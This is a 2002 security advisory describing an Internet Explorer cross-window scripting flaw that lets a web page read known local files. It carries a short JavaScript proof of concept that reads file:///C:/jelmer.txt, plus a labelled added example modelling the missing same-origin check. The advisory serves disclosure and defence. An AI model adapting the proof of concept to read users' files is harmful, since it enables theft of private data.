[NT] More Reading of Local Files Vulnerabilities in MSIE
From: support@securiteam.com Date: 01/14/02
From: support@securiteam.com To: list@securiteam.com Date: Mon, 14 Jan 2002 08:53:11 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
More Reading of Local Files Vulnerabilities in MSIE
------------------------------------------------------------------------
SUMMARY
There is a security vulnerability in IE 5.5 and 6 (probably other versions
as well) which allows reading and sending of local files. The problem lies
in the fact that you are able to access a local file's domain by calling
the execScript function on a newly created window. The sample exploit
provided can only read browser-readable files; however, it is highly likely
that reading binary files is possible as well (by attaching an event to
the domain that calls the HTTP XML component, which itself at the time of
writing is still vulnerable as well). In order for this exploit to work,
the file name must be known.
Further, if your exploit page is modified so that a website is opened
rather than a local file, the calling script can access the properties of
the website.
(NOTE, this vulnerability is similar in concept to:
<http://www.securiteam.com/windowsntfocus/6W00D2K3FS.html> Internet
Explorer 6 Allows Local File Reading (XMLHTTP))
DETAILS
Vulnerable systems:
Internet Explorer version 6 (Windows XP with all patches installed)
Internet Explorer version 5.5 (Windows ME)
Example:
(NOTE: SCRIPT's 'I' letter has been replaced with a !)
<scr!pt language="javascript">
var extDoc
function doIt() {
  // open an external window and store the reference to it in extDoc
  extDoc = document.open('file:///C:/jelmer.txt','jelmer','height=200,width=400,status=no,toolbar=no,menubar=no,location=no');
  // wait 2 seconds for the external window to load
  // then execute some javascript code that displays the body of the document
  cmd = 'extDoc.execScript("alert(document.body.innerText)", "Jscript");';
  setTimeout(cmd,2000);
}
</script>
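The sample above works because no origin check stands between the calling page and the window it opened. The following is an added example, not part of the original advisory and not Internet Explorer's code: a simplified model of the same-origin decision a browser has to make before honouring a cross-window script call such as execScript. The function names and every URL other than file:///C:/jelmer.txt are assumptions made for illustration, and treating file: URLs as opaque origins is a policy choice of this model.

```javascript
// Simplified model of the cross-window access check (illustrative only).

// Return a comparable origin string, or null for an opaque origin.
// Only http/https get a tuple origin; file:, data:, javascript: etc. do not.
function originOf(urlString) {
  let u;
  try {
    u = new URL(urlString);
  } catch (e) {
    return null; // unparsable URL: treat as opaque
  }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') {
    return null; // local files must never share an origin with anything
  }
  // The URL parser drops default ports, so restore them for comparison.
  const port = u.port || (u.protocol === 'https:' ? '443' : '80');
  return u.protocol + '//' + u.hostname + ':' + port;
}

// Decide whether script running in callerUrl may run script in targetUrl.
// An opaque origin is never equal to anything, including another opaque
// origin. Comparing URL.origin strings directly would get this wrong,
// because every opaque origin serialises to the same string "null".
function mayScript(callerUrl, targetUrl) {
  const caller = originOf(callerUrl);
  const target = originOf(targetUrl);
  if (caller === null || target === null) {
    return false;
  }
  return caller === target;
}

// Constructed cases mirroring the two scenarios in the advisory,
// plus one legitimate same-site call for contrast.
function advisoryCases() {
  const page = 'http://untrusted.example/page.html'; // constructed caller
  return {
    webToLocalFile: mayScript(page, 'file:///C:/jelmer.txt'),
    webToOtherSite: mayScript(page, 'http://other.example/'),
    sameSite: mayScript(page, 'http://untrusted.example:80/frame.html'),
    fileToFile: mayScript('file:///C:/a.html', 'file:///C:/jelmer.txt'),
  };
}
```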
Workaround:
Disable active scripting.
ADDITIONAL INFORMATION
The information has been provided by <mailto:jelmer@kuperus.xs4all.nl>
jelmer.